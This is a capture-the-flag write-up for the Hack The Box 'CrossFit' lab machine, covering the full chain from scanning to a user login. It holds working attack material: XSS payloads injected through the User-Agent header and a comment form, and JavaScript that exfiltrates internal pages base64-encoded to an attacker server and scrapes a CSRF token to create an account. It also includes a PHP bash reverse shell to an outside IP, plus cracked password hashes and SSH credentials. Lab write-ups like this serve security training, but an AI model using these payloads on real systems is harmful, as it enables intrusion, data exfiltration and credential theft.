CROSSFIT_USER_WRITEUP_DETAILED
Difficulty: Insane
Points: 50
Release: 19 Sep 2020
IP: 10.10.10.208
NMAP
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ssl-cert: Subject: commonName=*.crossfit.htb/organizationName=Cross Fit Ltd./stateOrProvinceName=NY/countryName=US
| Not valid before: 2020-04-30T19:16:46
|_Not valid after: 3991-08-16T19:16:46
|_ssl-date: TLS randomness does not represent time
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 b0:e7:5f:5f:7e:5a:4f:e8:e4:cf:f1:98:01:cb:3f:52 (RSA)
| 256 67:88:2d:20:a5:c1:a7:71:50:2b:c8:07:a4:b2:60:e5 (ECDSA)
|_ 256 62:ce:a3:15:93:c8:8c:b6:8e:23:1d:66:52:f4:4f:ef (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
50500/tcp filtered unknown
PORT 80
 |
| port 80/nothing intresting, default apche page |
its a dead end i tryed gobuster/ffuf noting finded so i ran nmap once more for specific port number start with ftp 21
FTP:21
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 2.0.8 or later
| ssl-cert: Subject: commonName=*.crossfit.htb/organizationName=Cross Fit Ltd./stateOrProvinceName=NY/countryName=US/emailAddress=info@gym-club.crossfit.htb
| Issuer: commonName=*.crossfit.htb/organizationName=Cross Fit Ltd./stateOrProvinceName=NY/countryName=US/emailAddress=info@gym-club.crossfit.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-04-30T19:16:46
| Not valid after: 3991-08-16T19:16:46
| MD5: 557c 36e4 424b 381e eb17 708a 6138 bd0f
| SHA-1: 25ec d2fe 6c9d 7704 ec7d d792 8767 4bc3 8d0e cbce
| -----BEGIN CERTIFICATE-----
| MIID0TCCArmgAwIBAgIUFlxL1ZITpUBfx69st7fRkJcsNI8wDQYJKoZIhvcNAQEL
| BQAwdzELMAkGA1UEBhMCVVMxCzAJBgNVBAgMAk5ZMRcwFQYDVQQKDA5Dcm9zcyBG
| aXQgTHRkLjEXMBUGA1UEAwwOKi5jcm9zc2ZpdC5odGIxKTAnBgkqhkiG9w0BCQEW
| GmluZm9AZ3ltLWNsdWIuY3Jvc3NmaXQuaHRiMCAXDTIwMDQzMDE5MTY0NloYDzM5
| OTEwODE2MTkxNjQ2WjB3MQswCQYDVQQGEwJVUzELMAkGA1UECAwCTlkxFzAVBgNV
| BAoMDkNyb3NzIEZpdCBMdGQuMRcwFQYDVQQDDA4qLmNyb3NzZml0Lmh0YjEpMCcG
| CSqGSIb3DQEJARYaaW5mb0BneW0tY2x1Yi5jcm9zc2ZpdC5odGIwggEiMA0GCSqG
| SIb3DQEBAQUAA4IBDwAwggEKAoIBAQDgibxJvtPny7Vee6M0BFBPFBohEQ+0zLDq
| LdkW/OSl4tfEdZYn6U5cNYKTyYJ8CuytGlMpFw5OgOBPATtBYoGrQZdlN+7LQwF+
| CZsedPs30ijAhygI7pM5S0hwiqdVReR/hhFHD/zry3M5+9NGeDLPgLbQG8qgPspv
| Y+ErCXXotxVI+VrTPfGkjPixfgUTYsEetrkmXlig0S2ukxmNs7HXkjli4Z+qpGrn
| mpFQokBE6RlD6VjxPzx0pfgK587s7F0/pIfXTHGfIOMnqXuLKBXsYIAEjJQxlLUt
| U3lb7aZdqIZnvhTuzuOxFUIe5dRWyfERyODEd5WUlwsbY4Qo2HhZAgMBAAGjUzBR
| MB0GA1UdDgQWBBTG3S2NuuXiSQ4dRvDnLqiWQdvY7jAfBgNVHSMEGDAWgBTG3S2N
| uuXiSQ4dRvDnLqiWQdvY7jAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUA
| A4IBAQB/tGKHZ9oXsqLGGW0wRRgCZj2adl1sq3S69e9R4yVQW7zU2Sw38CAA/O07
| MEgbqrzUI0c/T+Wb1D+gRamCUxSB7FXfMzGRhwUqMsLp8uGNlxyDcMU34ecRwOil
| r4jLmfeGyok1r8CFHg8Om1TeZfzNeVtkAkqf3XoIxbKQk4s779n/84FAtLkZNqyb
| cSv8nnClQQSlf42P3AiRBbwM1Cx9SyKq977sIwOzKTOM4NcSivNdtov+Pc0z+T9I
| 95SsqLKtO/8T0h6hgY6JQG1+A4ivnlZ8nqSFWYsnX10lJN2URlAwXUYuTw0vCMy+
| Xk0OmbR/oG052H02ZsmfJQhqPNF1
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
Service Info: Host: Cross
yep we go vhost
emailAddress=info@gym-club.crossfit.htb
 |
| gym-club.crossfit.htb |
After some enumeration i find a comment form let’s try something in that.
blog-single.php
First i capture the request in my burp and try various thing like XSS.
I change User-Agent feild and comment feild to ping my python simpleHTTPServer
<script src="http://10.10.14.8:8001/"></script>
BURP INTERCEPTED VALUE
POST /blog-single.php HTTP/1.1
Host: gym-club.crossfit.htb
User-Agent: <script src="http://10.10.14.78:8001/"></script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 154
Origin: http://gym-club.crossfit.htb
Connection: close
Referer: http://gym-club.crossfit.htb/blog-single.php
Upgrade-Insecure-Requests: 1
name=sakthi80&email=test@mail.com%&phone=9939399393&message=<script src="http://10.10.14.8:8001/"></script>&submit=submit
RESULT
┌──(sakthi㉿kali)-[~]
└─$ python -m SimpleHTTPServer 8001
Serving HTTP on 0.0.0.0 port 8001 ...
10.10.10.208 - - [14/03/2021 08:19:27] "GET / HTTP/1.1" 200 -
Now i try everything but nothing work so think about other ways that we need to attack ftp.crossfit.htb.
But the question is where he find that subdomain.
After some hit and try i understand that we need to find that from localhost (using XSS) can see another vhost that only accepts resquest from the local machine and the host is ftp.crossfit.htb that thinking about.
How to create HTTP request in Js?
refer this Blog
With the help of this article i find my way to communicate with ftp.crossfit.htb.
So what we do now we create a .js file called sakthi.js that give the response page of the ftp.crossfit.htb in our python srver.
Let’s try this real quick....
STEP 1
Create a file called luci.js
- sakthi.js
myhttpserver = 'http://10.10.14.78/'
targeturl = 'http://ftp.crossfit.htb/'
req = new XMLHttpRequest;
req.onreadystatechange = function() {
if (req.readyState == 4) {
req2 = new XMLHttpRequest;
req2.open('GET', myhttpserver + btoa(this.responseText),false);
req2.send();
}
}
req.open('GET', targeturl, false);
req.send();
STEP 2
Open a python simple http server in your working directory were the sakthi.js file exist.
Now capture the request of comment form and send it to the repeater tab and add the value that show in the image.
<script src="http://10.10.14.78/lsakthi"></script>
BURP REQUEST
POST /blog-single.php HTTP/1.1
Host: gym-club.crossfit.htb
User-Agent: <script src="http://10.10.14.78/sakthi.js"></script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
Origin: http://gym-club.crossfit.htb
Connection: close
Referer: http://gym-club.crossfit.htb/blog-single.php
Upgrade-Insecure-Requests: 1
name=sakthi80&email=test@mail.com%&phone=9939399393&message=<script src="http://10.10.14.78:8001/"></script>&submit=submit
Let’s send the request and check our python server.
┌──(sakhi@kali)-[~/hackthebox/machine/crossfit]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.208 - - [15/Mar/2021 08:45:54] "GET /sakthi.js HTTP/1.1" 200 -
10.10.10.208 - - [15/Mar/202108:45:55] code 404, message File not found
10.10.10.208 - - [15/Mar/2021 08:45:55] "GET /PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KPGhlYWQ+CiAgICA8dGl0bGU+RlRQIEhvc3RpbmcgLSBBY2NvdW50IE1hbmFnZW1lbnQ8L3RpdGxlPgogICAgPGxpbmsgaHJlZj0iaHR0cHM6Ly9jZG5qcy5jbG91ZGZsYXJlLmNvbS9hamF4L2xpYnMvdHdpdHRlci1ib290c3RyYXAvNC4wLjAtYWxwaGEvY3NzL2Jvb3RzdHJhcC5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CjwvaGVhZD4KPGJvZHk+Cgo8YnI+CjxkaXYgY2xhc3M9ImNvbnRhaW5lciI+CiAgICAgICAgPGRpdiBjbGFzcz0icm93Ij4KICAgICAgICA8ZGl2IGNsYXNzPSJjb2wtbGctMTIgbWFyZ2luLXRiIj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0icHVsbC1sZWZ0Ij4KICAgICAgICAgICAgICAgIDxoMj5GVFAgSG9zdGluZyAtIEFjY291bnQgTWFuYWdlbWVudDwvaDI+CiAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJwdWxsLXJpZ2h0Ij4KICAgICAgICAgICAgICAgIDxhIGNsYXNzPSJidG4gYnRuLXN1Y2Nlc3MiIGhyZWY9Imh0dHA6Ly9mdHAuY3Jvc3NmaXQuaHRiL2FjY291bnRzL2NyZWF0ZSI+IENyZWF0ZSBOZXcgQWNjb3VudDwvYT4KICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgPC9kaXY+CiAgICA8L2Rpdj4KCiAgICAKICAgIDx0YWJsZSBjbGFzcz0idGFibGUgdGFibGUtYm9yZGVyZWQiPgogICAgICAgIDx0cj4KICAgICAgICAgICAgPHRoPk5vPC90aD4KICAgICAgICAgICAgPHRoPlVzZXJuYW1lPC90aD4KICAgICAgICAgICAgPHRoPkNyZWF0aW9uIERhdGU8L3RoPgogICAgICAgICAgICA8dGggd2lkdGg9IjI4MHB4Ij5BY3Rpb248L3RoPgogICAgICAgIDwvdHI+CgogICAgICAgIAogICAgPC90YWJsZT4KCiAgICAKCjwvZGl2PgoKPC9ib2R5Pgo8L2h0bWw+Cg== HTTP/1.1" 404 -
It give us a base64 string.
Let’s decode this and see what inside.
<!DOCTYPE html>
<html>
<head>
<title>FTP Hosting - Account Management</title>
<link href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.0.0-alpha/css/bootstrap.css" rel="stylesheet">
</head>
<body>
<br>
<div class="container">
<div class="row">
<div class="col-lg-12 margin-tb">
<div class="pull-left">
<h2>FTP Hosting - Account Management</h2>
</div>
<div class="pull-right">
<a class="btn btn-success" href="http://ftp.crossfit.htb/accounts/create"> Create New Account</a>
</div>
</div>
</div>
<table class="table table-bordered">
<tr>
<th>No</th>
<th>Username</th>
<th>Creation Date</th>
<th width="280px">Action</th>
</tr>
</table>
</div>
</body>
</html>
It’s a html code for ftp.crossfit.htb wepsite.
If you not conform Let’s open this in browser.
It’s a FTP Hosting - Account Management page.
Let’s create new user.
But first Let’s check what is the url when we click on create new account.
http://ftp.crossfit.htb/accounts/create
sakthi.js
myhttpserver = 'http://10.10.14.78/'
targeturl = 'http://ftp.crossfit.htb/accounts/create'
req = new XMLHttpRequest;
req.onreadystatechange = function() {
if (req.readyState == 4) {
req2 = new XMLHttpRequest;
req2.open('GET', myhttpserver + btoa(this.responseText),false);
req2.send();
}
}
req.open('GET', targeturl, false);
req.send();
Let’s send the request again in burp.
And we got the response,,,
┌──(sakthi@kali)-[~/hackthebox/machine/crossfit]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.208 - - [15/Mar/2021 08:55:42] "GET /sakthi.js HTTP/1.1" 200 -
10.10.10.208 - - [15/Mar/2021 08:55:42] code 404, message File not found
10.10.10.208 - - [15/Mar/2021 08:55:42] "GET /PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KPGhlYWQ+CiAgICA8dGl0bGU+RlRQIEhvc3RpbmcgLSBBY2NvdW50IE1hbmFnZW1lbnQ8L3RpdGxlPgogICAgPGxpbmsgaHJlZj0iaHR0cHM6Ly9jZG5qcy5jbG91ZGZsYXJlLmNvbS9hamF4L2xpYnMvdHdpdHRlci1ib290c3RyYXAvNC4wLjAtYWxwaGEvY3NzL2Jvb3RzdHJhcC5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CjwvaGVhZD4KPGJvZHk+Cgo8YnI+CjxkaXYgY2xhc3M9ImNvbnRhaW5lciI+CiAgICAKPGRpdiBjbGFzcz0icm93Ij4KICAgIDxkaXYgY2xhc3M9ImNvbC1sZy0xMiBtYXJnaW4tdGIiPgogICAgICAgIDxkaXYgY2xhc3M9InB1bGwtbGVmdCI+CiAgICAgICAgICAgIDxoMj5BZGQgTmV3IEFjY291bnQ8L2gyPgogICAgICAgIDwvZGl2PgogICAgICAgIDxkaXYgY2xhc3M9InB1bGwtcmlnaHQiPgogICAgICAgICAgICA8YSBjbGFzcz0iYnRuIGJ0bi1wcmltYXJ5IiBocmVmPSJodHRwOi8vZnRwLmNyb3NzZml0Lmh0Yi9hY2NvdW50cyI+IEJhY2s8L2E+CiAgICAgICAgPC9kaXY+CiAgICA8L2Rpdj4KPC9kaXY+CgoKPGZvcm0gYWN0aW9uPSJodHRwOi8vZnRwLmNyb3NzZml0Lmh0Yi9hY2NvdW50cyIgbWV0aG9kPSJQT1NUIj4KICAgIDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9Il90b2tlbiIgdmFsdWU9IkJobURaQWlMN0JDc01kbnRvOXIwTnlyVW5yTldQcFhZRE1HbEVtQ08iPgogICAgIDxkaXYgY2xhc3M9InJvdyI+CiAgICAgICAgPGRpdiBjbGFzcz0iY29sLXhzLTEyIGNvbC1zbS0xMiBjb2wtbWQtMTIiPgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJmb3JtLWdyb3VwIj4KICAgICAgICAgICAgICAgIDxzdHJvbmc+VXNlcm5hbWU6PC9zdHJvbmc+CiAgICAgICAgICAgICAgICA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0idXNlcm5hbWUiIGNsYXNzPSJmb3JtLWNvbnRyb2wiIHBsYWNlaG9sZGVyPSJVc2VybmFtZSI+CiAgICAgICAgICAgIDwvZGl2PgogICAgICAgIDwvZGl2PgogICAgICAgIDxkaXYgY2xhc3M9ImNvbC14cy0xMiBjb2wtc20tMTIgY29sLW1kLTEyIj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0iZm9ybS1ncm91cCI+CiAgICAgICAgICAgICAgICA8c3Ryb25nPlBhc3N3b3JkOjwvc3Ryb25nPgogICAgICAgICAgICAgICAgPGlucHV0IHR5cGU9InBhc3N3b3JkIiBuYW1lPSJwYXNzIiBjbGFzcz0iZm9ybS1jb250cm9sIiBwbGFjZWhvbGRlcj0iUGFzc3dvcmQiPgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L2Rpdj4KICAgICAgICA8ZGl2IGNsYXNzPSJjb2wteHMtMTIgY29sLXNtLTEyIGNvbC1tZC0xMiB0ZXh0LWNlbnRlciI+CiAgICAgICAgICAgICAgICA8YnV0dG9uIHR5cGU9InN1Ym1pdCIgY2xhc3M9ImJ0biBidG4tcHJpbWFyeSI+U3VibWl0PC9idXR0b24+CiAgICAgICAgPC9kaXY+CiAgICA8L2Rpdj4KCjwvZm9ybT4KCjwvZGl2PgoKPC9ib2R5Pgo8L2h0bWw+Cg== HTTP/1.1" 404 -
Again decode it and open in browser.
<!DOCTYPE html>
<html>
<head>
<title>FTP Hosting - Account Management</title>
<link href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.0.0-alpha/css/bootstrap.css" rel="stylesheet">
</head>
<body>
<br>
<div class="container">
<div class="row">
<div class="col-lg-12 margin-tb">
<div class="pull-left">
<h2>Add New Account</h2>
</div>
<div class="pull-right">
<a class="btn btn-primary" href="http://ftp.crossfit.htb/accounts"> Back</a>
</div>
</div>
</div>
<form action="http://ftp.crossfit.htb/accounts" method="POST">
<input type="hidden" name="_token" value="BhmDZAiL7BCsMdnto9r0NyrUnrNWPpXYDMGlEmCO">
<div class="row">
<div class="col-xs-12 col-sm-12 col-md-12">
<div class="form-group">
<strong>Username:</strong>
<input type="text" name="username" class="form-control" placeholder="Username">
</div>
</div>
<div class="col-xs-12 col-sm-12 col-md-12">
<div class="form-group">
<strong>Password:</strong>
<input type="password" name="pass" class="form-control" placeholder="Password">
</div>
</div>
<div class="col-xs-12 col-sm-12 col-md-12 text-center">
<button type="submit" class="btn btn-primary">Submit</button>
</div>
</div>
</form>
</div>
</body>
</html>
There is two field username and password.
But the tricky part is if you see the source code there is a hidden value called _token which value dynamically change so if we create a payload to register user we need to grep the _token value from web page.
After some hit and try create a payload to register user.
createuser.js
myhttpserver = 'http://10.10.14.78'
targeturl = 'http://ftp.crossfit.htb/accounts/create'
username = 'sakthi'
password = 'sakthi2'
req = new XMLHttpRequest;
req.withCredentials = true;
req.onreadystatechange = function() {
if (req.readyState == 4) {
req2 = new XMLHttpRequest;
req2.open('GET', myhttpserver + btoa(this.responseText), false);
req2.send();
}
}
req.open('GET', targeturl, false);
req.send();
regx = /token" value="(.*)"/g;
token = regx.exec(req.responseText)[1];
var params = '_token=' + token + '&username=' + username + '&pass=' + password + '&submit=submit'
req.open('POST', "http://ftp.crossfit.htb/accounts", false);
req.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
req.send(params);
Now send the req in burp with this createuser.js file like this.
<script src="http://10.10.14.78/createuser.js"></script>
POST /blog-single.php HTTP/1.1
Host: gym-club.crossfit.htb
User-Agent: <script src="http://10.10.14.8/createuser.js"></script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
Origin: http://gym-club.crossfit.htb
Connection: close
Referer: http://gym-club.crossfit.htb/blog-single.php
Upgrade-Insecure-Requests: 1
name=sakthi80&email=test@mail.com%&phone=9939399393&message=<script src="http://10.10.14.78:8001/"></script>&submit=submit
Let’s check the python listner.
and receive the response:
10.10.10.208 - - [15/Mar/2021 09:05:09] "GET /createuser.js HTTP/1.1" 200 -
And i use lftp to connect with ftp.
┌──(sakthi@kali)-[~/hackthebox/machine/crossfit]
└─# lftp
lftp :~> set ftp:ssl-force true
lftp :~> connect 10.10.10.208
lftp 10.10.10.208:~> set ssl:verify-certificate no
lftp 10.10.10.208:~> login sakthi
lftp sakthi@10.10.10.208:~> ls
drwxrwxr-x 2 33 1002 4096 Sep 21 09:45 development-test
drwxr-xr-x 13 0 0 4096 May 07 2020 ftp
drwxr-xr-x 9 0 0 4096 May 12 2020 gym-club
drwxr-xr-x 2 0 0 4096 May 01 2020 html
lftp sakthi@10.10.10.208:/>
We find another sub-domain called: development-test.crossfit.htb
Let’s add this in our /etc/hosts file.
If you closely see that we have read and write access of development-test directory.
So that mean we can upload a php reverse shell and execute it with our rev.js file.
STEP 1
Create a file called rev.php.
rev.php
<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.78/9988 0>&1'") ?>
STEP 2
Create another file called rev.js that will execute our rev.php.
rev.js
req = new XMLHttpRequest;
req.open('GET',"http://development-test.crossfit.htb/rev.php");
req.send();
STEP 3
Start you python server on the same directory were all files exist and netcat Listener.
┌──(sakthi@kali)-[~/hackthebox/machine/crossfit]
└─# ls
createuser.js sakthi.js rev.js rev.php
┌──(sakthi@kali)-[~/hackthebox/machine/crossfit]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
STEP 4
upload the rev.php in ftp development-test directory.
┌──(sakthi@kali)-[~/hackthebox/machine/crossfit]
└─# lftp
lftp :~> set ftp:ssl-force true
lftp :~> connect 10.10.10.208
lftp 10.10.10.208:~> set ssl:verify-certificate no
lftp 10.10.10.208:~> login sakthi
lftp luci@10.10.10.208:~> ls
drwxrwxr-x 2 33 1002 4096 Sep 21 09:45 development-test
drwxr-xr-x 13 0 0 4096 May 07 2020 ftp
drwxr-xr-x 9 0 0 4096 May 12 2020 gym-club
drwxr-xr-x 2 0 0 4096 May 01 2020 html
lftp luci@10.10.10.208:/> cd development-test
lftp luci@10.10.10.208:/development-test> ls
lftp luci@10.10.10.208:/development-test> put rev.php
69 bytes transferred in 17 seconds (9 B/s)
lftp luci@10.10.10.208:/development-test> ls
-rw-r--r-- 1 1002 1002 69 Nov 28 14:30 rev.php
STEP 5
Go to burp repeater tab and edit it to rev.js and send it:
POST /blog-single.php HTTP/1.1
Host: gym-club.crossfit.htb
User-Agent: <script src="http://10.10.14.78/rev.js"></script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Origin: http://gym-club.crossfit.htb
Connection: close
Referer: http://gym-club.crossfit.htb/blog-single.php
Upgrade-Insecure-Requests: 1 name=sakthi80&email=test@mail.com%&phone=9939399393&message=<script src="http://10.10.14.78:8001/"></script>&submit=submit
Now let’s see our netcat listner
10.10.10.208 - - [15/Mar/2021 09:29:23] "GET /rev.js HTTP/1.1" 200 -
┌──(sakthi@kali)-[~]
└─# nc -lvp 9988
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9988
Ncat: Listening on 0.0.0.0:9988
Ncat: Connection from 10.10.10.208.
Ncat: Connection from 10.10.10.208:37118.
id
bash: cannot set terminal process group (712): Inappropriate ioctl for device
bash: no job control in this shell
www-data@crossfit:/var/www/development-test$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@crossfit:/var/www/development-test$ whoami
whoami
www-data
Now let’s run the linPEAS.
After analyze the output i found hashes
[+] Looking for specific hashes inside files - less false positives (limit 70)
/etc/ansible/playbooks/adduser_hank.yml:$6$e20D6nUeTJOIyRio$A777Jj8tk5.sfACzLuIqqfZOCsKTVCfNEQIbH79nZf09mM.Iov/pzDCE8xNZZCM9MuHKMcjqNUd8QUEzC1CZG/
/var/www/ftp/database/factories/UserFactory.php:$2y$10$92IXUNpkjO0rOQ5byMi.Ye4oKoEa3Ro9llC/.og/at2.uheWG/igi
HASHES
$6$e20D6nUeTJOIyRio$A777Jj8tk5.sfACzLuIqqfZOCsKTVCfNEQIbH79nZf09mM.Iov/pzDCE8xNZZCM9MuHKMcjqNUd8QUEzC1CZG/
$2y$10$92IXUNpkjO0rOQ5byMi.Ye4oKoEa3Ro9llC/.og/at2.uheWG/igi
Let’s crack it with john.
┌──(sakthi@kali)-[~/hackthebox/machine/crossfit]
└─# john -w=/usr/share/wordlists/rockyou.txt hash
Warning: only loading hashes of type "sha512crypt", but also saw type "bcrypt"
Use the "--format=bcrypt" option to force loading hashes of that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
powerpuffgirls (?)
1g 0:00:00:05 DONE (2020-11-28 09:51) 0.1919g/s 4618p/s 4618c/s 4618C/s tajmahal..hunibuni
Use the "--show" option to display all of the cracked passwords reliably
Session completed
And we got the password called powerpuffgirls
And this hash is for hank user that we see in linPEAS result.
Let’s try to ssh in and got our user.txt flag.
SSH CREDENTIALS
User --- hank
Password -- powerpuffgirls
 |
| user.txt |
ROOT FLAG
UPDATE SOOON..........................................
Post a Comment